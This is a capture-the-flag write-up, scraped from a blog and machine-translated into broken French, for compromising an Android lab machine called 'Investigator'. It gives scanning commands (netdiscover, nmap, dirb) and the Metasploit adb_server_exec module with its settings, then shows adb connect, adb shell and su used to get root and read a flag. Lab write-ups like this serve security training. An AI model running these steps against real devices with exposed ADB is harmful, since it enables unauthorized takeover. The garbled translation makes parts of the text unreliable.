当前位置:网站首页>Essai de pénétration de la cible Investigator
Essai de pénétration de la cible Investigator
2022-04-22 01:24:00 【Xiao Wang xiansen】
InvestigatorTest de pénétration de la cible
Environnement
kaliMachine d'attaqueIP192.168.1.105
CibleIP192.168.1.101
Outils
netdiscover;nmap,dirb,msf,adb,
Processus
C'est un.AndroidLa première fois que la cible joue

La règle est de balayer l'ordinateur central
netdiscover -i eth0
Suivi des objectifsipAvecnmapEffectuer un balayage de port pour recueillir des informationsnmap -sV -p- -T5 192.168.1.101

D'abord, oui.http Service for Information Collection Access 8080Port
Ça veut dire qu'on va aider l'agent. ; J'ai donné 10 messages à un agent. 6 J'ai essayé. Le Code de démarrage était incorrect.
Alors Faites sauter le catalogue. dirb http://192.168.1.101:8080

Donner à un répertoire http://192.168.1.101:8080/.htaccess
Il n'y a rien dans le fichier suivant.

Il y en a un autre.5555PortnmapAfficheradbServices
J'ai vérifié les informations sur Internet
Android Debug Bridge(adb)C'est unAndroidOutils en ligne de commande pour, Peut être utilisé pour connecter un simulateur ou un appareil mobile réel .
adbFournit beaucoup de commandes(adb shell, adb pull), Pour contrôler l'équipement . Ces commandes d'action sont disponibles en adb Dans le système ,Tout s'appelle“Services”.
Voyez s'il y a quelque chose à utiliser. adbModule de vulnérabilité
searchsploit adb
Rien du tout
msfconsoleOuvre.MSFRegarde s'il y a
search adbJ'ai trouvé unAndroid Script d'exécution de commande à distance disponible pour
useModule
use exploit/android/adb/adb_server_exec
options Pour voir la configuration, vous devez configurer la cible et l'attaquant ip

set(rhostC'est la cibleip lhost C'est une cible d'attaque. )

run
Puis rouvrir les terminaux adb connect 192.168.1.101:5555 Établir une connexion(kaliOui, non.adb Besoin de télécharger par vous - même apt install adb)
Et puisadb shellJ'ai réussi.shell
su Le droit direct est root

Indata/rootTrouvé dans le catalogueflag.txt

J'a i essayé une série de chiffres, mais ce n'est pas un code de démarrage. data/systemEn baspasswor.keyDocumentation
Il n'y a rien dans le mot de passe vide.


Pénétrer ici ,Première frappeAndroid Il n'y a rien de spécial à apprendre.
版权声明
本文为[Xiao Wang xiansen]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204220109452312.html
边栏推荐
- Observe cloud landing in Alibaba cloud computing nest and build a new ISV ecosystem
- The R language coin package is applied to permutation tests for independence problems and Wilcox Test function performs Wilcoxon signed rank test for two groups of data and wilcoxsign is used_ Test fu
- 05 Lua control structure
- 走进Android架构,吃透这份Android高级工程师面试497题解析
- php.ini Module ‘redis‘ already loaded in Unknown on line 0
- R language ggplot2 visualizes scatter plot, highlights the specified data points based on combination rules, sets the size and color of data points
- 系统工程师面试问题,大专生三面蚂蚁金服
- Ma Qianli, vice president of Babbitt: the rise of NPC in the era of meta universe, digital identity protocol may become an import-level product - 2022 yuan universe cloud Summit
- 腾讯团队实力打造flutter入门教程,1-3年Android开发工程师面试经验分享
- 腾讯T3大牛手把手教你,90%的人看完都说好
猜你喜欢

学习 Butterfly主题美化 这一篇就够了

3D 沙盒游戏之人物的点击行走移动

While hoarding goods, it's time to recognize cans again

If the garment industry wants to survive the "epidemic disaster", why does winner fashion become a growth sample?

Redis个人笔记:Redis应用场景,Redis常见命令,Reids缓存击穿穿透,Redis分布式锁实现方案,秒杀设计思路,Redis消息队列,Reids持久化,Redis主从哨兵分片集群

Click, walk and move of characters in 3D sandbox game

High expansion and high availability engineering practice of recommended resource bits related to short video app

网络模型 LSTM模型内容详解

腾讯团队实力打造flutter入门教程,1-3年Android开发工程师面试经验分享

【Pranet】论文及代码解读(ResNet部分)——jialiang nie
随机推荐
安装包签名检测
Set the countdown of 5 seconds in setTimeout
How does PR adjust the exported data rate and total bit rate
Is it reliable for Huishang futures to open an account? Is it safe?
腾讯T3大牛手把手教你,90%的人看完都说好
(9)JVCL之Edit与打开文件、打开目录、选取时间、按钮、计算器、IP地址的合二为一
.Net Core 限流控制-AspNetCoreRateLimit
Interview questions for system engineers, college students, ant gold clothes on three sides
贼厉害,最新Android面试合集
MySQL創建遠程登陸用戶並授權
The latest interview question of redis in 2022 Part 1 - basic knowledge of redis
The WPF control created through WinForm control cannot be input
05 Lua control structure
3D 沙盒游戏之人物的点击行走移动
投资对情绪的把控
2022年Redis最新面试题第1篇 - Redis基础知识
trollcave靶机渗透测试
Tencent team strength to create an introduction course to fluent, 1-3 years of Android Development Engineer Interview Experience Sharing
Investigator靶机渗透测试
Fast r-cnn code detailed annotation data shape